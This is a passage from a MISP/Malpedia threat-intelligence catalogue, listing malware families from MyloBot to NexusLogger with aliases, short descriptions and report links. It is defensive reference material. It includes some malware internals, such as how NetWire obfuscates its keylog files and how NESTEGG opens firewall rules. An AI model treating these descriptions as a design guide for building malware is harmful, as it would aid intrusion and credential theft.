https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators
AhnLabAnalysis%20Report_MyKings%20Botnet.pdf[AhnLabAnalysis%20Report_MyKings%20Botnet.pdf]
http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/

MyloBot

The tag is: misp-galaxy:malpedia="MyloBot"

MyloBot is also known as:

FakeDGA
WillExec

Table 2259. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot
https://blog.centurylink.com/mylobot-continues-global-infections/
https://github.com/360netlab/DGA/issues/36
http://www.freebuf.com/column/153424.html
https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html
http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html
https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/

MysterySnail

The tag is: misp-galaxy:malpedia="MysterySnail"

MysterySnail is also known as:

Table 2260. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mystery_snail
https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/

MZRevenge

The tag is: misp-galaxy:malpedia="MZRevenge"

MZRevenge is also known as:

MaMo434376

Table 2261. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mzrevenge
https://dissectingmalwa.re/a-projectexe-that-should-have-stayed-in-a-drawer-mzrevenge-mamo434376.html

N40

Botnet with focus on banks in Latin America and South America. Relies on DLL Sideloading attacks to execute malicious DLL files. Uses legitimate VMWare executable in attacks. As of March 2019, the malware is under active development with updated versions coming out on persistent basis.

The tag is: misp-galaxy:malpedia="N40"

N40 is also known as:

Table 2262. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.n40
http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware
https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector
http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html
https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/

Nabucur

The tag is: misp-galaxy:malpedia="Nabucur"

Nabucur is also known as:

Table 2263. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur

NACHOCHEESE

According to FireEye, NACHOCHEESE is a command-line tunneler that accepts delimited C&C IPs or domains via command-line and gives actors shell access to a victim’s system.

The tag is: misp-galaxy:malpedia="NACHOCHEESE"

NACHOCHEESE is also known as:

Cyruslish
TWOPENCE
VIVACIOUSGIFT

Table 2264. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b
https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/
https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html

Nagini

The tag is: misp-galaxy:malpedia="Nagini"

Nagini is also known as:

Table 2265. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini
http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/

Naikon

The tag is: misp-galaxy:malpedia="Naikon"

Naikon is also known as:

Sacto

Table 2266. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://securelist.com/analysis/publications/69953/the-naikon-apt/
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Nanocore RAT

Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.

The tag is: misp-galaxy:malpedia="Nanocore RAT"

Nanocore RAT is also known as:

Nancrat
NanoCore

Table 2267. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore
https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/
https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/
https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter
https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors
https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/
https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/
https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://www.ic3.gov/media/news/2020/200917-1.pdf
https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html
https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat
https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332
https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://goggleheadedhacker.com/blog/post/11
https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/
https://www.secureworks.com/research/threat-profiles/cobalt-trinity
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore
https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/
https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware
https://malwareindepth.com/defeating-nanocore-and-cypherit/
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

NanoLocker

The tag is: misp-galaxy:malpedia="NanoLocker"

NanoLocker is also known as:

Table 2268. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker

Narilam

The tag is: misp-galaxy:malpedia="Narilam"

Narilam is also known as:

Table 2269. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam
http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html
https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage

Nautilus

The tag is: misp-galaxy:malpedia="Nautilus"

Nautilus is also known as:

Table 2270. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus
https://www.secureworks.com/research/threat-profiles/iron-hunter
https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims
https://www.ncsc.gov.uk/alerts/turla-group-malware

NavRAT

The tag is: misp-galaxy:malpedia="NavRAT"

NavRAT is also known as:

JinhoSpy

Table 2271. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat
https://www.youtube.com/watch?v=rfzmHjZX70s
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/
https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf
https://blog.talosintelligence.com/2018/05/navrat.html?m=1

nccTrojan

The tag is: misp-galaxy:malpedia="nccTrojan"

nccTrojan is also known as:

Table 2272. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan
https://www.youtube.com/watch?v=1WfPlgtfWnQ
https://vblocalhost.com/uploads/VB2020-20.pdf
https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9
https://twitter.com/ESETresearch/status/1441139057682104325?s=20
https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan
https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

Nebulae

The tag is: misp-galaxy:malpedia="Nebulae"

Nebulae is also known as:

Table 2273. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nebulae
https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf
https://twitter.com/SyscallE/status/1390339497804636166
https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

Necurs

The tag is: misp-galaxy:malpedia="Necurs"

Necurs is also known as:

nucurs

Table 2274. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs
https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs
https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features
http://www.secureworks.com/research/threat-profiles/gold-riverview
http://blog.talosintelligence.com/2017/03/necurs-diversifies.html
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/
https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf
https://www.secureworks.com/research/threat-profiles/gold-riverview
https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much
https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/
https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/
https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/
https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/

NedDnLoader

The tag is: misp-galaxy:malpedia="NedDnLoader"

NedDnLoader is also known as:

Table 2275. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

Nefilim

According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.

The tag is: misp-galaxy:malpedia="Nefilim"

Nefilim is also known as:

Nephilim

Table 2276. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim
https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/
https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/
https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion
https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html
https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry
https://securelist.com/evolution-of-jsworm-ransomware/102428/
https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf
https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/
https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html
http://www.secureworks.com/research/threat-profiles/gold-mansard
https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware
https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/
https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html
https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data

Nemim

The tag is: misp-galaxy:malpedia="Nemim"

Nemim is also known as:

Nemain

Table 2277. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim
https://www.secureworks.com/research/threat-profiles/tungsten-bridge
http://blog.nsfocus.net/darkhotel-3-0908/

Nemty

Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed through similar ways as Sodinokibi and also noted artfifacts they had seen before in Gandcrab.

The tag is: misp-galaxy:malpedia="Nemty"

Nemty is also known as:

Table 2278. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty
https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/
https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://securelist.com/evolution-of-jsworm-ransomware/102428/
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/
http://www.secureworks.com/research/threat-profiles/gold-mansard
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet
https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/
https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw
https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b
https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html
https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/
https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md
https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/

neshta

Neshta is a 2005 Belarusian file infector virus . The name of the virus comes from the Belarusian word "nesta" meaning "something." The program is a Windows application (exe file). Written in Delphi . The size of the original malicious file is 41,472 bytes . This file virus is the type of virus that is no longer popular at present.

The tag is: misp-galaxy:malpedia="neshta"

neshta is also known as:

Table 2279. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta
https://www.virusradar.com/en/Win32_Neshta.A/description
https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest
https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html

NESTEGG

NESTEGG is a memory-only backdoor that can proxy commands to other infected systems using a custom routing scheme. It accepts commands to upload and download files, list and delete files, list and terminate processes, and start processes. NESTEGG also creates Windows Firewall rules that allows the backdoor to bind to a specified port number to allow for inbound traffic.

The tag is: misp-galaxy:malpedia="NESTEGG"

NESTEGG is also known as:

Table 2280. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg
https://content.fireeye.com/apt/rpt-apt38
https://youtu.be/_kzFNQySEMw?t=789
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf
https://youtu.be/8hJyLkLHH8Q?t=1208
https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html

NetC

The tag is: misp-galaxy:malpedia="NetC"

NetC is also known as:

Table 2281. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.netc
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

NETEAGLE

The tag is: misp-galaxy:malpedia="NETEAGLE"

NETEAGLE is also known as:

Neteagle_Scout
ScoutEagle

Table 2282. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

NetfilterRootkit

The tag is: misp-galaxy:malpedia="NetfilterRootkit"

NetfilterRootkit is also known as:

Table 2283. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.netfilter
https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/
https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit
https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/
https://www.intezer.com/blog/malware-analysis/fast-insights-for-a-microsoft-signed-netfilter-rootkit/
https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users

NetFlash

The tag is: misp-galaxy:malpedia="NetFlash"

NetFlash is also known as:

Table 2284. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.netflash
https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/

NetKey

The tag is: misp-galaxy:malpedia="NetKey"

NetKey is also known as:

Table 2285. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey
https://twitter.com/kevinperlow/status/1156406115472760835

Netrepser

The tag is: misp-galaxy:malpedia="Netrepser"

Netrepser is also known as:

Table 2286. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger
https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/

NetSupportManager RAT

The tag is: misp-galaxy:malpedia="NetSupportManager RAT"

NetSupportManager RAT is also known as:

NetSupport

Table 2287. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat
https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/
https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/
https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html
https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html
http://www.netsupportmanager.com/index.asp

NetTraveler

The tag is: misp-galaxy:malpedia="NetTraveler"

NetTraveler is also known as:

TravNet

Table 2288. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler
https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/
https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

NetWire RC

Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.

Keylog files are stored on the infected machine in an obfuscated form. The algorithm is:

for i in range(0,num_read):
    buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF

The tag is: misp-galaxy:malpedia="NetWire RC"

NetWire RC is also known as:

NetWeird
NetWire
Recam

Table 2289. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire
https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html
https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf
https://www.circl.lu/pub/tr-23/
https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors
https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line
https://news.drweb.ru/show/?i=13281&c=23
https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/
https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728
https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/
https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA
https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire
https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign
https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data
https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html
https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/
https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/
https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://news.sophos.com/en-us/2020/05/14/raticate/
https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/
https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.[https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.]
https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers
https://www.secureworks.com/research/threat-profiles/cobalt-trinity
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

Neuron

The tag is: misp-galaxy:malpedia="Neuron"

Neuron is also known as:

Table 2290. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron
https://www.secureworks.com/research/threat-profiles/iron-hunter
https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims
https://www.ncsc.gov.uk/alerts/turla-group-malware

Neutrino

The tag is: misp-galaxy:malpedia="Neutrino"

Neutrino is also known as:

Kasidet

Table 2291. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino
https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22
https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/
http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html
https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/
https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/
https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet
https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html
https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/
https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/
http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/
https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex
http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html
http://blog.ptsecurity.com/2019/08/finding-neutrino.html

Neutrino POS

The tag is: misp-galaxy:malpedia="Neutrino POS"

Neutrino POS is also known as:

Table 2292. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos
https://securelist.com/neutrino-modification-for-pos-terminals/78839/

NewCore RAT

The tag is: misp-galaxy:malpedia="NewCore RAT"

NewCore RAT is also known as:

Table 2293. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat
https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html
https://securelist.com/cycldek-bridging-the-air-gap/97157/
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/
https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations
https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view
https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6

NewPass

The tag is: misp-galaxy:malpedia="NewPass"

NewPass is also known as:

Table 2294. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass
https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/

NewPosThings

The tag is: misp-galaxy:malpedia="NewPosThings"

NewPosThings is also known as:

Table 2295. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings
https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/
https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html

NewsReels

The tag is: misp-galaxy:malpedia="NewsReels"

NewsReels is also known as:

Table 2296. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

NewCT

The tag is: misp-galaxy:malpedia="NewCT"

NewCT is also known as:

Table 2297. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf
http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf
https://www.secureworks.com/research/threat-profiles/bronze-express

Nexster Bot

The tag is: misp-galaxy:malpedia="Nexster Bot"

Nexster Bot is also known as:

Table 2298. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot
https://twitter.com/benkow_/status/789006720668405760

NexusLogger

The tag is: misp-galaxy:malpedia="NexusLogger"

NexusLogger is also known as:

Table 2299. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger
http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/
